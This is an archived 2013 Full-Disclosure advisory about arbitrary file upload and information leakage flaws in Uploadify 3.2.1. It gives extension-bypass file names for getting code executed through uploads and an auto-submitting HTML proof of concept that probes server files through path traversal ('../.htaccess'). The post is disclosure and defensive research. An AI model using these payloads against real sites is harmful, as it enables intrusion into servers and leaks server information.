lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 25 Oct 2013 15:27:30 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: AFU and IL vulnerabilities in Uploadify

Hello list!

These are Arbitrary File Uploading and Information Leakage vulnerabilities 
in Uploadify. The same as in June with previous vulnerabilities in 
Uploadify, in September the developers just ignored my warnings, even I sent 
letter to multiple their e-mail addresses.

-------------------------
Affected products:
-------------------------

Vulnerable are Uploadify v3.2.1 and previous versions.

-------------------------
Affected vendors:
-------------------------

Reactive Apps
http://www.uploadify.com

----------
Details:
----------

Arbitrary File Uploading (WASC-31):

Code Execution attack via file uploading. There are two methods of code 
execution: by using of symbol ";" (1.asp;.jpg) in file name (IIS) and by 
double extension (1.php.jpg) (Apache with special configuration).

Information Leakage (WASC-13):

Checking arbitrary file existence at the server.

Uploadify IL.html

<html>
<head>
<title>Uploadify Information Leakage exploit (C) 2013 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/uploadify/check-exists.php" 
method="post">
<input type="hidden" name="filename" value="../.htaccess">
</form>
</body>
</html>

------------
Timeline:
------------ 

2013.09.20 - announced at my site.
2013.09.21 - informed developers on multiple e-mails.
2013.10.24 - disclosed at my site (http://websecurity.com.ua/6777/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ